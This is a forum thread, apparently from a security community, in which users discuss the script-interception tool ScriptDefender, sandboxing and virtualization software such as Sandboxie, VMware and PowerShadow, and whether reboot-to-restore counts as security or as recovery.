You're excused ;D

OK Guys. I installed ScriptDefender, which protect me against these script extensions :

.VBS .VBE .JS .JSE .HTA .WSF .WSH .SHS .SHB

Anymore extensions ?

And thanks for expanding my security set with another execution-killer. ;D

PS: I could run the test.vbs without warning and that is not a good sign.
Problem fixed.

-{ Quote: "OK Guys. I installed ScriptDefender, which protect me against these script extensions :

.VBS .VBE .JS .JSE .HTA .WSF .WSH .SHS .SHB

Anymore extensions ?

And thanks for expanding my security set with another execution-killer. ;D

PS: I could run the test.vbs without warning and that is not a good sign.
Problem fixed." }-

Erik, you have done your system a very huge favor indeed but i do spot one missing, and it regards your system registry. .REG I know ScriptSentry covers that one too, dunno about ScriptDefender though.

-{ Quote: "Erik, you have done your system a very huge favor indeed but i do spot one missing, and it regards your system registry. .REG I know ScriptSentry covers that one too, dunno about ScriptDefender though." }-
Done and thanks. I will put all these extensions in my installation file of ScriptDefender to remember them in case I reinstall from scratch.

Script Defender v1.02
http://www.analogx.com/CONTENTS/download/system/sdefend.htm

.HTA, .JS, .JSE, .REG, .SHB, .SHS, .VBE, .VBS, .WSF, .WSH in alfabetical order. :)

-{ Quote: "OK Guys. I installed ScriptDefender, which protect me against these script extensions :" }-Hello ErikAlbert,

As you know, this program modifies your Registry, so be sure and have a backup of your Registry,
and if you decide to uninstall, follow their procedures exactly.

See this old thread:

http://www.wilderssecurity.com/showthread.php?t=101823

regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

-{ Quote: "As you know, this program modifies your Registry, so be sure and have a backup of your Registry,
" }-
I don't backup my registry, because it is included in my freeze storage, my archived on-line snapshot and also imaged.
That is 3 x backup.

-{ Quote: "I don't backup my registry," }-OK, my statement should have read, In case of a mishap, Be sure you can revert back to a previous Registry before the installation of SD :)

regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

-{ Quote: "Are you telling us, that you first heard of Script Defender (http://www.analogx.com/CONTENTS/download/system/sdefend.htm) at 4:02PM, and at 8:49PM, you installed it and it is now part of your freeze snap? (those times are my local time)

You did notice that program was "Last updated on Saturday, December 22, 2001 11:53:52 PM PST".

Mike" }-
So what ? It seems to work. Are you checking on me ? We are the good guys remember ?

-{ Quote: "I assume "So what?" is about the age?

I thought you tested software for a very long time before it was moved into your freeze snap.

I am just so surprised you almost instantly found it to be good, that's all.

Mike" }-
This product is known for quite some time and used by many members. So what should be the problem. My MS Office is more than 7 years old and it still works.

One difference between AE and SD is that AE alerts you and takes the decision for you. SD only alerts you and the decision has to be made by you.

-{ Quote: "One difference between AE and SD is that AE alerts you and takes the decision for you. SD only alerts you and the decision has to be made by you." }-
Yes I noticed. AE gives you just a warning without decision and SD gives you a warning with execute or abort.
I'm still not convinced I need SD, because I still don't have a list of 80+ executables, verified by AE. I asked Faronics for such a list, but they didn't give it to me with a cheap excuse. On their website they only mention 9 of 80+, so I don't know the rest.
Getting straight answers nowadays seems to be very difficult, even when you ask the RIGHT people.

Don't worry about it Erik. I still use FileMapp byBB which is by far more relic then ScriptDefender but i'll tell you what, it was THE ONLY program that registered a "hidden" file was released in System32 before it went stealth when i tested a rootkit on my system.

Otherwise, no program would have ever even known of it's existence including some popular ARK's.

Latest is not always the greatest and oft times more than not, something which might be considered outdated by most still can carry the mail if you catch my drift. ;) I still use Kerio 2.15 and can't even get a nibble like a port scan.

Logical question regarding Script Defender :

If I can add the file extension .REG, I assume I can add ANY file extension in Script Defender, not only script file extensions.
Which would mean that Script Defender is more like an Extension Defender. Am I right about this ?
Thank you in advance.

PS: SD has a dumb uninstaller, but that is common for most softwares.

Yes, you can add any extension and SD will intercept it.
When you install your favourite media player, you associate it with .mp3, .wav, .avi, .vmv extensions. SD does the same with scripts extensions. Very simple, eh?
You only need SD due to AE's lack of script interception.
Prior to uninstalling, you must reset the associations.

-{ Quote: "Prior to uninstalling, you must reset the associations." }-
I know, but I don't understand why I have to remove intercepts, the programmers of SD should have programmed this in the uninstaller of SD. :(

I'd call it a "functional bug".
For example, if you're going to uninstall SpywareBlaster, you must disable the protection first.
I'd be concerned of these "bugs" in paid software. SD and SWB are freebies (and very good ones), so I can't complaint.

Hello,
To answer the original question:
Programs running in virtual environment can do only what the environment permits them. If the virtual environment allows its contents to modify files on the host system - then they will - but that's kind of contrary to virtualization - as opposed to physicalization.
Mrk

-{ Quote: "Hello,
To answer the original question:
Programs running in virtual environment can do only what the environment permits them. If the virtual environment allows its contents to modify files on the host system - then they will - but that's kind of contrary to virtualization - as opposed to physicalization.
Mrk" }-
The purpose of virtualization is, that a malware installs itself in an environment, where it can do NOTHING, not even sending data over the internet.
If the developper of the virtualization software didn't succeed in doing this, then his software doesn't work properly and needs to be corrected.
Virtualization is supposed to work like that and I don't want anything else, otherwise I can better work in a real environment.
I understand that it isn't easy, but that's the ART of programming and there are alot of differences between programmers from very bad to very brilliant. :)

-{ Quote: "The purpose of virtualization is, ...not even sending data over the internet." }-If that were so,then you could not surf the internet, because to connect to a web site, the browser has to send out data (DNS request, your IP address).

Or are you thinking of something else?

regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

Hello,

The purpose of virtualization is to create a virtual layer of hardware for programs to run on and use. If this layer permits internet access, then malware installed in it will have internet access.

Example: if you allow NAT for a virtual machine in VMware Server, anything installed in a guest OS will be able to dial out. But if you set the virtual machine to host only, then it will not have this access. Very simple.

Mrk

-{ Quote: "The purpose of virtualization is, that a malware installs itself in an environment, where it can do NOTHING, not even sending data over the internet.
If the developper of the virtualization software didn't succeed in doing this, then his software doesn't work properly and needs to be corrected.
Virtualization is supposed to work like that and I don't want anything else, otherwise I can better work in a real environment.
I understand that it isn't easy, but that's the ART of programming and there are alot of differences between programmers from very bad to very brilliant.

:)" }-

Wish i am the virtu developper who can make the thing you wish,i become richer than uncle bill in no time !!

-{ Quote: "
Wish i am the virtu developper who can make the thing you wish,i become richer than uncle bill in no time !!" }-
What looks impossible at first sight, doesn't mean it is impossible, you just have to think LONGER or have better brains than the rest. Never heard of inventions ?
You can't boot in an archived snapshot of FDISR either according the manual, but it is possible once you know how FDISR works.

-{ Quote: "I'd call it a "functional bug".
For example, if you're going to uninstall SpywareBlaster, you must disable the protection first.
I'd be concerned of these "bugs" in paid software. SD and SWB are freebies (and very good ones), so I can't complaint." }-
At work we call this a mistake of an application analyst, but lots of programs are created by programmers only. Programmers aren't analysts and a good analyst/programmer (one person) doesn't exist, they are usually a good analyst or a good programmer but seldom both. They are cheaper for the boss. :)

-{ Quote: "What looks impossible at first sight, doesn't mean it is impossible, you just have to think LONGER or have better brains than the rest. Never heard of inventions ?
You can't boot in an archived snapshot of FDISR either according the manual, but it is possible once you know how FDISR works." }-

As you stated many times around this Wilders " i never trust any security app "or words alike,in practical implications virtual is of no difference as compared with the host and virtual has to be treated like the hostsystem,there is no magical "something in there" what makes the difference,and for sure protect your virtu you do like mothersystem,and also i differ in opinion with you that someday some time in the future technical advances lead to total protection,remember the gloomy dudes are also advancing, maybe the super coders already reside on the darkside,its all about money and i have no illusions.

-{ Quote: "The purpose of virtualization is, that a malware installs itself in an environment, where it can do NOTHING, not even sending data over the internet.
If the developper of the virtualization software didn't succeed in doing this, then his software doesn't work properly and needs to be corrected.
Virtualization is supposed to work like that and I don't want anything else, otherwise I can better work in a real environment.
I understand that it isn't easy, but that's the ART of programming and there are alot of differences between programmers from very bad to very brilliant. :)" }-
I'm sorry, but that's your wish of what virtualization should be like, not what it really should be. Depending on the virtualization software you use, you can tell it to virtualize a network connection, or disable it completely. Virtualization is a very powerful tool whose usage is not limited to malware containment. It wasn't designed specifically to combat malware at all, but due to its operating principles it ends up doing just that very nicely, though I guess you wouldn't know that. ::)

Hello,
Erik, you quoted me by accident. I did not write that virtu sentence. Huupi did.
Thanks,
Mrk

:) I noticed that too. I thought i was going nuts!

Wonder if PowerShadow loads the system into memory like the Returnil Virtual App?Hence some users reporting their systems running faster in PS mode?
-{ Quote: "Returnil Virtual System is a powerful technology that clones a copy of your Windows system into RAM. It is quite simply the most advanced Virtual Partition solution available. Returnil Virtual System protects your computer from harmful viruses, spyware and unwanted programs, preserves your computer settings, and ensures your Internet Privacy. Simply restart your computer to erase all changes.

When the Returnil protection is ON, your Windows system is running on a virtual partition meaning that every single change in the system partition actually takes place in the memory. Therefore all data and modifications will be lost after your system is rebooted. When the Returnil Protection is OFF, you can install or remove any programs, create documents or download your favorite music as you normally do. All changes in the system partition are saved to your real hard drive. By restarting you PC, Returnil will make your system partition identical and fully functional according to the original configurations.
" }-
Returnil Virtual System (http://www.returnilvirtualsystem.com/index_files/returnilvirtualsystem.htm)

-{ Quote: "Wonder if PowerShadow loads the system into memory like the Returnil Virtual App?Hence some users reporting their systems running faster in PS mode?" }-The precursors to current virtual technology were the various RAM disk drivers. People would work in a RAM disk because of the speed. One of my programming friends compiling in a RAM disk, for example. On bootup, you allocate a RAM disk (virtual), and it would go away on next bootup.

A very innovative product was vRamDir, which I used for many years in the mid '90s. It's its difference was that you were not limited to the normal 32MB RAM disk size, rather, you could allocate as much RAM as you wanted, depending upon how much free RAM was available on you system.

In those days (mid '90s) processor speed was not as high as today, and it was like flying to do word processing and graphics in a RAM disk, or virtual directory, in the case of vRamDir.

We never thought of it as protection against malware, because only the directory you specified was loaded into RAM, where today, working on an entirely different principle, the entire partition or system is loaded into RAM, as in the case of Returnil.

I stopped using vRamDir once CPU speed increased to the point where my working in a real environment was fast enough.

I notice that vRamDir is still available - the same file dated from 1996! Designed for Win9x, I doubt it would work on NT systems.

http://www.btsoftware.com/products/vramdir.htm

I still have my install file, although I never use it, but I do remember those days of working in RAM!

regards,

-rich

My guess, it does something like the *nix chroot (http://en.wikipedia.org/wiki/Chroot) command.

Under the folder C:\$ISR, there are folders with just a number, ie: 0, 1, 2, etc

Under those number folders is apparently a complete copy of each snapshot.

So, I am guessing it does a "chroot C:\$ISR\2". This fakes out XP to think the partition starts below C:\$ISR\2.

I am also guessing the VSS service keeps the current running system in sync with the appropriate numbered folder.

The Copy/Update command just does a "simple" difference between each number folder to figure out what to keep/change/delete.

What do you think of my goofy idea?

Mike

-{ Quote: "I'm sorry, but that's your wish of what virtualization should be like, not what it really should be. Depending on the virtualization software you use, you can tell it to virtualize a network connection, or disable it completely. Virtualization is a very powerful tool whose usage is not limited to malware containment. It wasn't designed specifically to combat malware at all, but due to its operating principles it ends up doing just that very nicely, though I guess you wouldn't know that. ::)" }-
I'm used to use imperfect security softwares and not to find what I really want.
That's why I replace my current system partition with a clean, trouble-free and malware-free partition during each reboot and that removes every mistake of my security softwares.
I only need my security softwares to save the period between two reboots as good as possible.

These developpers of virtualization softwares would save me alot of time, if they described their softwares in an objective way and telling the full truth. What it does and above all what it not does. It would save me alot of posts as well. :)

Erik, sometimes we just miss that, but they do write those things:
http://www.vmware.com/solutions/whitepapers.html
See Virtualization Overview for instance.
I've lost track of this thread, so one final sentence:
VMware is not like SandboxIE. They are similar in some aspects, but NOT the same by a long shot.

-{ Quote: "These developpers of virtualization softwares would save me alot of time, if they described their softwares in an objective way and telling the full truth. What it does and above all what it not does. It would save me alot of posts as well. :)" }-
Well, I guess their description also relies a fair bit on the user knowing what virtualization is in the first place. Are you going to take on antivirus software vendors for not telling you that making your morning coffee is not part of their software's functions?

-{ Quote: "Well, I guess their description also relies a fair bit on the user knowing what virtualization is in the first place. Are you going to take on antivirus software vendors for not telling you that making your morning coffee is not part of their software's functions?" }-
In stead of praising their software into heaven, they better tell the users what it doesn't do. This has nothing to do with making coffee. I might be less-knowledgeable, but I'm not stupid. :)

-{ Quote: "In stead of praising their software into heaven, they better tell the users what it doesn't do. This has nothing to do with making coffee. I might be less-knowledgeable, but I'm not stupid. :)" }-
Well, there's a lot that virtualization doesn't do. They could write a bible on what virtualization doesn't do.

My point was simply that some things are too redundant for vendors to mention. It would be nice to provide a Virtualization 101 on their website for users who have no idea what the concept is, but the truth is, I wouldn't be too shocked if they didn't.

-{ Quote: "Well, there's a lot that virtualization doesn't do. They could write a bible on what virtualization doesn't do." }-
The principle of virtualization is quite simple : trap the malware in an environment where it becomes useless. But it's already clear to me that they didn't succeed in doing this and that's why you have a bible on what virtualization doesn't do. :)

:ouch: Read the pdf!
Containing malware is a side effect, because of how it operates. Still, how do you figure "they didn't succeed in doing this"?

-{ Quote: "The principle of virtualization is quite simple : trap the malware in an environment where it becomes useless. But it's already clear to me that they didn't succeed in doing this and that's why you have a bible on what virtualization doesn't do. :)" }-
Wrong. Like I said, virtualization was never designed as an anti-malware tool to begin with. Its creators never said, "Oh, let's invent a new way to safely stop viruses and malware." It was created so that users could have an isolated environment to test and experiment around with, without leaving any permanent effects on the host system. This is useful in a number of ways, and a side-effect of the functions of virtualization was that users could execute malware inside this isolated environment without harming the host system.

So as you can see, your principle of virtualization is dead wrong. The whole concept of it is not as simple as trapping malware.

Hi ErikAlbert,

I didn't know what VM was really about, until I read/listened to these Steve Gibson's articles (quite verbose, but rather entertaining):
Ep 50: Virtual Machine History & Technology
Ep 53: VMWare

http://www.grc.com/SecurityNow.htm

-{ Quote: "Wrong. Like I said, virtualization was never designed as an anti-malware tool to begin with." }-
That is very clear to me now. In other words softwares like Sandboxie and PowerShadow don't belong in the Anti-Malware forum, I mentioned this several times already, but most members seem to consider them as anti-malware.

I sensed that question would pop:
-{ Quote: "
I've lost track of this thread, so one final sentence:
VMware is not like SandboxIE. They are similar in some aspects, but NOT the same by a long shot." }-
While we were talking about VMware type of virtualisation, we were not talking about sandboxes that use a form of file system virtualization (something in those lines).

SandboxIE is a security program, just that it is not the answer for everything.
And at what it does, i still have to hear anyone reference malware that evades SandboxIE, ie, installs itself on your system through it.

Same goes for VMware. Concepts exist, but i didn't read anyone say here's trojan_killer_rootkit_bufferoverflow_app.exe that really does evade VMware.

ErikAlbert,

I realized your opening post is actually about Sandboxie & PowerShadow virtualization, though discussion steered to VM on Page 4.

I should have included "Ep 55: Application Sandboxes" in my post above, sorry.

-{ Quote: "ErikAlbert,

I realized your opening post is actually about Sandboxie & PowerShadow virtualization, though discussion steered to VM on Page 4.

I should have included "Ep 55: Application Sandboxes" in my post above, sorry." }-
It was in fact about all virtualization softwares. I just wanted to know how good they are. The bottom line is, that I don't really need them.
Keeping your harddisk UNCHANGED has nothing to do with security IMO.
FDISR isn't a security software either although it keeps my harddisk also unchanged.
Keeping your harddisk unchanged is a form of recovery, nothing more than that and recovery isn't security.

-{ Quote: "
Keeping your harddisk UNCHANGED has nothing to do with security IMO.
FDISR isn't a security software either although it keeps my harddisk also unchanged.
Keeping your harddisk unchanged is a form of recovery, nothing more than that and recovery isn't security." }-
FDISR does allow changes. You revert them, yes. I give up.:P

Well, if my parents had to surf the net using IE on their PC, then sandboxie would actually help keep out some nasties. So in that respect it would be considered anti-malware.

-{ Quote: "FDISR does allow changes. You revert them, yes. I give up.:P" }-
Restoring an IMAGE is also reverting changes, but Image Backup isn't security either. I would also use Image Backup on a computer without internet.
You are confusing security with recovery.
If a burglar breaks my window that has something to do with security.
If I replace the broken window with a new one, that is called recovery.

-{ Quote: "
You are confusing security with recovery.
" }-
Nope, you are. FDISR reverts changes, SandboxIE prevents them.

Still possible that some things occur, sure. But they are reduced to fewer possibilities. Rootkits for one are not possible.

-{ Quote: "Well, if my parents had to surf the net using IE on their PC, then sandboxie would actually help keep out some nasties. So in that respect it would be considered anti-malware." }-
Sandboxie isolates the nasties, that's not the problem.
Can the nasties do their evil job, that's the question.
Installation of malware is harmless and increases only the volume of your harddisk, the execution of malware is the real problem, which needs to be stopped.

Let's say during 1 session of surfing the net, the sandboxed IE homepage gets hijacked, some bad registry entries get added etc (I really don't know how malware & sandboxie interact, what's possible or not in that respect).

So everything's back to normal after flushing the sandbox, would sandboxie be considered anti-malware? Since their "evil job" here only lasted 1 session.

-{ Quote: "Let's say during 1 session of surfing the net, the sandboxed IE homepage gets hijacked, some bad registry entries get added etc (I really don't know how malware & sandboxie interact, what's possible or not in that respect).

So everything's back to normal after flushing the sandbox, would sandboxie be considered anti-malware? Since their "evil job" here only lasted 1 session." }-
Everything is back to normal, which means that the malware was able to do its evil job, but Sandboxie RECOVERED the situation. That's not security, that is recovery.

What happens when a malware is sandboxed and the malware is supposed to steal private info.
Will Sandboxie allow this or not ? That's the crucial question. If Sandboxie allows it, the harm is done and you can't revert that.

Sure it is security if running that malware inside Sandboxie prevents it from wiping out your harddisk contents. What you are talking about is more in my opinion of a privacy protection. The terminology and what it means to anyone of course varies from person to person.

But for that example, IE homepage was hijacked but then it's not. So from my parents' POV it's not hijacked.

Actually I totally understand your stance (recovery vs security). But the privacy bit, I'm not too sure if Sandboxie actually prevents access to them.

-{ Quote: "The principle of virtualization is quite simple : trap the malware in an environment where it becomes useless. But it's already clear to me that they didn't succeed in doing this and that's why you have a bible on what virtualization doesn't do. :)" }-

Actually Erik, that is quite true. If you look at VMware's website, very little is said about malware compared to the many other applications. Most of the software you have tried was probably developed and tested on a VM machine. It for example allows a developer to test a new driver, and if it crashes the machine, it doesn't prevent them from doing other things on the host. Lots of applications.

Pete

-{ Quote: "But for that example, IE homepage was hijacked but then it's not. So from my parents' POV it's not hijacked.

Actually I totally understand your stance (recovery vs security). But the privacy bit, I'm not too sure if Sandboxie actually prevents access to them." }-
Ask Tzuk, the developper of Sandboxie. If he doesn't know, nobody knows.

-{ Quote: "Actually Erik, that is quite true. If you look at VMware's website, very little is said about malware compared to the many other applications. Most of the software you have tried was probably developed and tested on a VM machine. It for example allows a developer to test a new driver, and if it crashes the machine, it doesn't prevent them from doing other things on the host. Lots of applications.

Pete" }-
Peter, I'm only trying to find out what virtualization softwares are worth by asking questions. IMO they don't stop the execution of malware at all, they only REMOVE them. That's recovery, not security. :)

-{ Quote: "These developpers of virtualization softwares would save me alot of time, if they described their softwares in an objective way and telling the full truth. What it does and above all what it not does. It would save me alot of posts as well. :)" }-
You need to differentiate technical data from marketing data. According to the marketing data from AV vendors, you shouldn't need more than a AV and a firewall to be hack-proof/malware-proof.

In simple terms:
- If the virtualization solution allows everything inside it, things don't get broken. Extreme case: VMware/Virtualbox. They're so flexible that they allow an OS to be installed.
- If the virtualization solution doesn't allow everything, things start to broke. You can't install an app which requires kernel drivers/services inside Sandboxie.

If the guest is completely separated from the host, the virtualization solution is perfect. That's why no known malware can do any harm if it's executed inside Sandboxie (although I prefer Geswall)
But malware can have access to data inside the sandbox (i.e. the browser cache, cookies), so you're still exposed to identity fraud.
-{ Quote: "What happens when a malware is sandboxed and the malware is supposed to steal private info.
Will Sandboxie allow this or not ? That's the crucial question. If Sandboxie allows it, the harm is done and you can't revert that." }-
The answer (http://www.wilderssecurity.com/showpost.php?p=1002556&postcount=42):
-{ Quote: "Answering your original question: Virtualization/sandboxes doesn't protect against keyloggers/password stealers. But, there are solutions to this issue:

- Encrypt your critical/sensitive information/files.
- Make a rule in the sandbox (GeSWall, Sandboxie and Defensewall all support confidential folders) to prevent disclosure of files/folders containing sensitive information. This prevents access to, for example, My Documents by sandboxed/isolated browser and objects created inside the sandbox

- Harden the security of the browser (NoScript, firewall rule for HTTPS traffic, etc) to prevent in-browser threats (XSS). This prevents against this threat (http://www.wilderssecurity.com/showthread.php?t=174195)" }-

Lucas,
In other words, if I don't encrypt my private data, Sandboxie will allow a malware to steal it.

Encrypt it and/or use the Closed File Path (http://www.sandboxie.com/index.php?ClosedFilePath) setting.

The "paper metaphore" from Sandboxie FAQ:
-{ Quote: "What is Sandboxie and how is it different than other solutions?

Think of your PC as a piece of paper. Every program you run writes on the paper. When you run your browser, it writes on the paper about every site you visited. And any malware you come across will usually try to write itself into the paper.

Traditional privacy and anti-malware software try to locate and erase any writings they think you wouldn't want on the paper. Most of the times they get it right. But first the makers of these solutions must teach the solution what to look for on the paper, and also how to erase it safely.

On the other hand, the Sandboxie sandbox works like a transparency layer placed over the paper. Programs write on the transparency layer and to them it looks like the real paper. When you delete the sandbox, it's like removing the transparency layer, the unchanged, real paper is revealed. " }-

And regarding keyloggers:
-{ Quote: "Will Sandboxie protect me from malicious key-loggers?

Yes, to some extent. First of all, your system (outside the sandbox) must not have been already compromised by an installed key-logger. Sandboxie can not protect against key-loggers that are already running outside the sandbox.

You may want to consider always browsing sandboxed, so you don't accidentally get any key-loggers into your system.

It is very difficult to reliably detect a key-logger. For a lengthy explanation, please see DetectingKeyLoggers. So the most important tool Sandboxie offers you for protection against key-loggers, is to delete the sandbox.

When you stop all sandboxed activity (in all sandboxes), then proceed to delete the sandbox you're about to use, you can be fairly certain that all key-loggers are dead. " }-
Sandboxie FAQ (http://www.sandboxie.com/index.php?FrequentlyAskedQuestions)

-{ Quote: "<snip> encrypt my private data <snip>" }-You may find this Hard Disk Encryption Revisitted (http://www.ranum.com/security/computer_security/index.html) interesting about TrueCrypt (http://www.truecrypt.org/)-{ Quote: "Free open-source disk encryption software for Windows Vista/XP/2000 and Linux" }-
Mike

-{ Quote: "Encrypt it and/or use the Closed File Path (http://www.sandboxie.com/index.php?ClosedFilePath) setting." }-

-{ Quote: "
[DefaultBox]
ClosedFilePath=!iexplore.exe,%Cookies%
ClosedFilePath=%Personal%
" }-
Terrific solution for housewives. ::)

-{ Quote: "You may find this Hard Disk Encryption Revisitted (http://www.ranum.com/security/computer_security/index.html) interesting about TrueCrypt (http://www.truecrypt.org/)
Mike" }-
I know TrueCrypt already and ditched it when I discovered that TC only protects me against physical theft, not on-line theft.
Once the encrypted container or volume is mounted, you are vulnerable for on-line theft.
I expected from encryption something else.

-{ Quote: "Lucas,
In other words, if I don't encrypt my private data, Sandboxie will allow a malware to steal it." }-
Do you usually store your private data in plaintext on your hard disk? :blink:

-{ Quote: "Do you usually store your private data in plaintext on your hard disk? :blink:" }-
I don't have any PERSONAL private data on my harddisk.
And the recent complicated login procedure of my online-banking makes any keylogger useless.

-{ Quote: "I don't have any PERSONAL private data on my harddisk.
And the recent complicated login procedure of my online-banking makes any keylogger useless." }-
So why all the fuss about preventing data theft, if it doesn't affect you? ;)

SandboxIE stops SOME form of keyloggers, but not all, since it's a form of incomplete virtualization. Complete virtualization will utterly fail against all types of keylogging attacks - but then, they can only steal whatever's in the virtual machine, and are unable to touch anything on the host. To hopefully stop the bush-beating, if an anti-keylogger solution is what you're after: there are three main methods to stop them. At execution (don't run suspicious programs), at where it injects global hooks or monitors APIs (use a good HIPS program), and at where it transmits data (use an outbound firewall). Any one of them should do the trick.

-{ Quote: "So why all the fuss about preventing data theft, if it doesn't affect you? ;)" }-
I'm not working for myself only.
I already said that I don't need anti-keylogger solution. Keyloggers can't catch my bank password, it changes constantly.

-{ Quote: "I'm not working for myself only." }-
Then hopefully you'll find one of the solutions listed above useful for protecting whatever data you need to.

-{ Quote: "Then hopefully you'll find one of the solutions listed above useful for protecting whatever data you need to." }-
At first sight, I don't need virtualization softwares. They don't prevent the execution of malwares, they remove it and I have already a removal solution.
I'm looking for softwares that stop the execution of malware, nothing else.
Thanks EVERYBODY !!!

-{ Quote: "At first sight, I don't need virtualization softwares. They don't prevent the execution of malwares, they remove it and I have already a removal solution.
I'm looking for softwares that stop the execution of malware, nothing else.
Thanks EVERYBODY !!!" }-
Pardon my asking, but unless you're using an unpatched copy of IE and/or have autorun enabled on your system...

Why do you need software to stop the execution of malware? In what way is not double-clicking on them not working for you?

-{ Quote: "Pardon my asking, but unless you're using an unpatched copy of IE and/or have autorun enabled on your system...

Why do you need software to stop the execution of malware? In what way is not double-clicking on them not working for you?" }-
Do you mean that ANY kind of infection requires a double-clicking to execute itself ?

-{ Quote: "Do you mean that ANY kind of infection requires a double-clicking to execute itself ?" }-
Well, erm, if we exclude the two auto-execute vectors mentioned above...

Duh? :blink:

-{ Quote: "Well, erm, if we exclude the two auto-execute vectors mentioned above...

Duh? :blink:" }-
Only two kinds ? Hard to believe.
How do I recognize a bad object, to avoid double-clicking ?

-{ Quote: "How do I recognize a bad object, to avoid double-clicking ?" }-
I don't know. That depends a whole lot on how you use your computer and what kinds of files you usually deal with. But applying the same policy as you use to create your Anti-Executable blacklist might be a good start.

I'm pretty sure those are the only two auto-execute vectors. Did I miss any? Depending on what other software you use, they might have vulnerabilities that expose them to arbitrary code execution, but outside of IE, they've been exceedingly rare so far, at least from what I know.

-{ Quote: "I don't know. That depends a whole lot on how you use your computer and what kinds of files you usually deal with. But applying the same policy as you use to create your Anti-Executable blacklist might be a good start.
" }-
I have Anti-Executable + Script Defender to protect me against double-clicking on bad executables. I don't see the difference between good and bad objects, unless I'm an expert. I have too many system files on my system partition, they look all the same to me. :)

-{ Quote: "I have Anti-Executable + Script Defender to protect me against double-clicking on bad executables. I don't see the difference between good and bad objects, unless I'm an expert. I have too many system files on my system partition, they look all the same to me. :)" }-
If you've scanned your system and made sure it's clean, then all you need to do is be careful of what you download and of files you get from external media. The fact is, Anti-Executable doesn't know what bad executables are either - it just prevents you from running what YOU tell it to block. And if you know what to tell it to block... how hard is it to just not run those same executables?

-{ Quote: "Peter, I'm only trying to find out what virtualization softwares are worth by asking questions. IMO they don't stop the execution of malware at all, they only REMOVE them. That's recovery, not security. :)" }-

Erik. A vm machine is just a computer pure and simple. You can do anything with it you can with a computer, including secure it, or leave it unprotected. All you are doing is transfering action and results from the host machine to the vm machine. When it comes to malware, the biggest is advantage is what I was able to do when messing with KillDisk. I experimented with recovery, but I didn't need to. All I had to do was revert to a previous snapshot, and it was all fixed. Similiar to your recovery concept except my host wasn't involved.

Pete

-{ Quote: "I have Anti-Executable + Script Defender to protect me against double-clicking on bad executables. I don't see the difference between good and bad objects, unless I'm an expert. I have too many system files on my system partition, they look all the same to me. :)" }-

@ErikAlbert

Good Day sir.

It's early but whats your impression of ScriptDefender so far. have you tested it against ANY scripts? Safe ones only of course. Reason i ask is if it covers more boundaries then my ScriptSentry you will have contributed to changing my own coverage for those.

-{ Quote: "... recovery isn't security." }-Security

1. freedom from danger, risk, etc.; safety.

2. freedom from care, anxiety, or doubt; well-founded confidence

Synonyms: assurance; safeguard
________________________________________

I can make the case that recovery is a part of a security strategy: in a worst-case scenario - loss of the computer by fire or theft - knowing I can recover my files from an off-site backup gives me "well-founded confidence" and "freedom from care, anxiety." My files are secured.

-{ Quote: "Keeping your harddisk UNCHANGED has nothing to do with security IMO." }-Reboot-to-restore is also a type of recovery, which I consider to be a significant part of a security strategy. Not just from malware, but from any changes to the system partition. Eg: corrupted files - once happened to me - Secedit.sdb - an error message just popped up while I was typing. It turned out to be a "Corrupt Group Policy Database File" - not uncommon with Win2K. Being able to reboot-to-restore saved me a lot of time from having to go through Microsoft's procedure. I consider that as much a part of security (= keeping secure, safe, unchanged) as protecting against malware.

Actually, a lot of the discussion in this thread has drifted away from your original post about virtualization, in which you stated,

-{ Quote: "AFAIK the principle of sandboxing and virtualization (Sandboxie, PowerShadow, ...) is to ISOLATE infections, so that they cannot install themselves on your real harddisk." }-Don't you think that if you need to "isolate an infection" you are admitting that an infected file had somehow gotten on to your hard drive? Do you really think that could happen with your setup and user common sense?

If you think through the ways an infected file could get on to your hard drive:

1) Through a port. Your Firewall takes care of that

2) Email, either by enticing you to open an infected attachment, or to click on a link. You've indicated many times that you would never get tricked into that

3) Web-based exploits -1: download a trojan by remote code execution. I don't know what browser you use, but if not IE, most of these exploits might not even run. Nonetheless, Anti-Executable takes care of it. Same with any other attempt to sneak in an executable: auto-run on a CD or USB drive, for example.

4) Web-based exploits -2: recent XSS and the sending out of login data: you've made it clear you don't keep personal information on your HD and that your bank's passwords methods are fool-proof.

Aren't you thoroughly covered? How else could an infected file get on to your computer? Give me an example.

In the very unlikely case that would happen, you have your reboot-to-restore solution.

BTW - just curious why you've added Script Defender? Give me an example of how you think a malicious script file could get on to your computer? How would it run other than being double-clicked? Why would you double-click on an unknown script file?

5) Trustingly installing a program. The last point of entry of an infected file. Here, I think you are covered, because you are the only person besides myself (unless I've missed it) that holds to this philosophy:

-{ Quote: "All my softwares are legitimate software on CD or downloaded from their homepage.
If you consider legitimate softwares as infected, then my frozen snapshot is indeed infected." }-I don't see any weaknesses in your setup. Why not just enjoy computing/surfing with what you have and don't be a worry-wart :)
(= tobber?)

regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

-{ Quote: "Security

1. freedom from danger, risk, etc.; safety.

2. freedom from care, anxiety, or doubt; well-founded confidence

Synonyms: assurance; safeguard
________________________________________

I can make the case that recovery is a part of a security strategy: in a worst-case scenario - loss of the computer by fire or theft - knowing I can recover my files from an off-site backup gives me "well-founded confidence" and "freedom from care, anxiety." My files are secured.

Reboot-to-restore is also a type of recovery, which I consider to be a significant part of a security strategy. Not just from malware, but from any changes to the system partition. Eg: corrupted files - once happened to me - Secedit.sdb - an error message just popped up while I was typing. It turned out to be a "Corrupt Group Policy Database File" - not uncommon with Win2K. Being able to reboot-to-restore saved me a lot of time from having to go through Microsoft's procedure. I consider that as much a part of security (= keeping secure, safe, unchanged) as protecting against malware.

Actually, a lot of the discussion in this thread has drifted away from your original post about virtualization, in which you stated,

Don't you think that if you need to "isolate an infection" you are admitting that an infected file had somehow gotten on to your hard drive? Do you really think that could happen with your setup and user common sense?

If you think through the ways an infected file could get on to your hard drive:

1) Through a port. Your Firewall takes care of that

2) Email, either by enticing you to open an infected attachment, or to click on a link. You've indicated many times that you would never get tricked into that

